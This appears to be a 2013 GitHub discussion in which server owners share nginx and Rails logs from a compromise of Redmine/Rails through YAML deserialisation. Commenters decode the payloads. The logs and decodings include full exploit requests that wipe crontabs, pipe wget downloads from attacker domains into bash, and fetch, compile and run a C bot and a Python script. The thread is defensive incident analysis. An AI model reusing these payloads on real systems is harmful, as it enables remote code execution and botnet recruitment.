 17837: 88.198.20.247 - - [24/May/2013:23:10:02 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA%253D%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4142 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17838: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17839: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17840: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 1020 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17841: 88.198.20.247 - - [24/May/2013:23:10:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3880 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17842  80.108.82.117 - - [25/May/2013:00:01:49 +0200] "f\xA9\xA4\xFAo\x7F\xD0\xD6\xCB\x05\x83T\x82\xE7\x18\xDF\xD9p\x94\x80\xA6FY89g;\xDA}\xFDE9A\xF1P|\xBB\xF1\xA9\xFD\xE0\xDB\xCC_\x9A\x9C1\x89t\xADj\x10\xED\x9B\xF4\x8E*\xB8\x941\xF5+\x0B.&\xC5\x97,Q\xB8\x04\x85" 400 166 "-" "-" "-"

Here (I don't know how..) he compiled the C program. (for me "k.c" & "sh.py")
And he tries to access my root account.

nginx/error.log

 1848  /home/my_login/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
 1849: --2013-05-24 21:14:01--  http://88.198.20.247/k.c
 1850: Connecting to 88.198.20.247:80... connected.
 1851  HTTP request sent, awaiting response... 200 OK
 1852  Length: 18854 (18K) [text/x-csrc]
 ....
 1858  
 1859  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1860: Lockfile found. Exiting.--2013-05-24 21:14:04--  http://88.198.20.247/k.c
 1861: Connecting to 88.198.20.247:80... connected.
 1862  HTTP request sent, awaiting response... 200 OK
 1863  Length: 18854 (18K) [text/x-csrc]
 ....
 1878  [ pid=856 thr=3065412416 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:49:42.117 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1879  [ pid=856 thr=3066215232 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:50:29.5 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1880: --2013-05-24 23:10:00--  http://88.198.20.247/k.c
 1881: Connecting to 88.198.20.247:80... connected.
 1882  HTTP request sent, awaiting response... 200 OK
 1883  Length: 18854 (18K) [text/x-csrc]
 ....
 1889  
 1890  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1891: Lockfile found. Exiting.--2013-05-24 23:10:02--  http://88.198.20.247/k.c
 1892: Connecting to 88.198.20.247:80... connected.
 1893  HTTP request sent, awaiting response... 200 OK
 1894  Length: 18854 (18K) [text/x-csrc]

 1906  HTTP request sent, awaiting response... 200 OK
 1907  Length: 2252 (2.2K) [text/plain]
 1908: Saving to: `/tmp/sh.py'
 1909  
 1910       0K ..                                                    100% 7.73M=0s
 1911  
 1912: 2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
 1913  
 1914  sudo: no tty present and no askpass program specified

2013-05-24 23:10:02 (218 KB/s) - `/tmp/k.c' saved [18854/18854]

/tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
Lockfile found. Exiting.Lockfile found. Exiting.sh: 1: Syntax error: "(" unexpected
--2013-05-25 00:36:29--  http://starfall.cu.cc/chips.txt
Resolving starfall.cu.cc (starfall.cu.cc)... 37.221.166.32
Connecting to starfall.cu.cc (starfall.cu.cc)|37.221.166.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2252 (2.2K) [text/plain]
Saving to: `/tmp/sh.py'

     0K ..                                                    100% 7.73M=0s

2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]

sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
telnet: Unable to connect to remote host: Connection refused
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
Connection closed by foreign host.
Connection closed by foreign host.
/home/remy/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.

I saw the "k.c" and i have the impression, he uses irc server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails'
He runs the program with a fake name "- bash" I saw that in the process list with htop

I think we have to warm all RoR developers...

@bu2
Copy link

bu2 commented May 26, 2013

Salut Remy,

Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out:

The 'back_url' is URL encodded twice:

$ irb
1.9.3p392 :002 > s = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'

1.9.3p392 :003 > CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=%0A---%0A%21ruby%2Fobject%3AGem%3A%3ARequirement%0Arequirements%3A%0A++-+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3AAbstract%3A%3ASessionHash%0A++++++env%3A%0A++++++++HTTP_COOKIE%3A+%22a%3DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%22%0A++++++by%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%0A++++++++coder%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%3A%3ABase64%3A%3AMarshal+%7B%7D%0A++++++++key%3A+a%0A++++++++secrets%3A+%5B%5D%0A++++++exists%3A+true%0A"

1.9.3p392 :004 > CGI.unescape CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=\n---\n!ruby/object:Gem::Requirement\nrequirements:\n - !ruby/object:Rack::Session::Abstract::SessionHash\n env:\n HTTP_COOKIE: "a=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0"\n by: !ruby/object:Rack::Session::Cookie\n coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}\n key: a\n secrets: []\n exists: true\n"

Then the 'HTTP_COOKIE' is base64 blob :

$ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0)
o:@activesupport::Deprecation::DeprecatedInstanceVariableProxy:@instanceoERB�: @srci"��system('crontab -r')
system('(crontab -l ; echo "1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k") | crontab -')
system('wget -O /dev/null 188.190.124.120/req/log.php')
�:�ET:
@method:
resu

And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erase user-level crontab replacing by its own crontab.

I don't know exactely how it work, it might me related to rack security issue disclosed earlier this year (or perhaps undisclosed vulnerability...).

Thanks again for the log!

Regards.

@Netmisa
Copy link

Netmisa commented May 26, 2013

Hello,

It's pleasure, as we know now what it is about. :)

Regards

@Leglaw
Copy link

Leglaw commented May 26, 2013

In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago.

@marutosi
Copy link

What version is your Redmine?
Redmine 2.3.1 uses Rails 3.2.13.
http://www.redmine.org/projects/redmine/repository/entry/tags/2.3.1/Gemfile#L3

@marutosi
Copy link

Redmine provides Security Advisories.
http://www.redmine.org/projects/redmine/wiki/Security_Advisories
Did you check it?

@Netmisa
Copy link

Netmisa commented May 27, 2013

My version is 2.2.
No I'm not checking that before, I should have... :/
I still did ticket on redmine.org (http://www.redmine.org/issues/14152).

@Leglaw : What is your PhPMyAdmin version ?

@marutosi
Copy link

2.2.x?
2.2.3 has Ruby on Rails vulnerability.

@bu2
Copy link

bu2 commented May 27, 2013

Regarding me I am on Rails 3.2.8 with custom application.

I have spotted 3 IPs which were sending malicious request to one of our server:
88.198.20.247
95.138.186.181
188.190.126.105

The malicious requests are messing with YAML parameters and Session Cookie.
Here is some extracts of the log with malicious request:

from 88.198.20.247:

Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000
Processing by PagesController#show as HTML
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.8ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.4ms)
Rendered layouts/_social_links.html.erb (2.8ms)
Rendered layouts/_messages.html.haml (3.6ms)
Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.9ms)
Rendered layouts/_my_favs.html.haml (4.5ms)

Rendered layouts/_ride_request_form.html.erb (15.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (6.2ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.8ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (4.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (4.3ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.9ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (91.0ms)
Rendered layouts/_head.html.erb (7.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (3.9ms)
Rendered layouts/_header.html.erb (1.5ms)
Rendered layouts/_menu.html.erb (0.5ms)
Rendered layouts/_my_favs.html.haml (4.4ms)

Rendered layouts/_ride_request_form.html.erb (14.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (93.0ms)
Rendered layouts/_head.html.erb (6.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (2.9ms)
Rendered layouts/_header.html.erb (1.3ms)
Rendered layouts/_menu.html.erb (0.4ms)
Rendered layouts/_my_favs.html.haml (4.0ms)

Rendered layouts/_ride_request_form.html.erb (13.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.8ms)
Rendered layouts/_head.html.erb (5.1ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000
Rendered /home/ggr/apps/ggr-dispatch/shared/bundle/ruby/1.9.1/gems/activeadmin-0.5.1/app/views/active_admin/resource/index.html.arb (3005.1ms)
Completed 200 OK in 3309ms (Views: 3197.3ms | ActiveRecord: 40.3ms)
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (86.6ms)
Rendered layouts/_head.html.erb (7.4ms)
Rendered layouts/_social_links.html.erb (4.2ms)
Rendered layouts/_messages.html.haml (4.0ms)
Rendered layouts/_header.html.erb (1.7ms)

Rendered layouts/_menu.html.erb (0.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Error occurred while parsing request parameters.
Contents:

SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end
wget http://88.198.20.247/k.c -O /tmp/k.c; gcc ...
^):
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in module_eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:166:in block in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:ineach'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:115:inadd'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
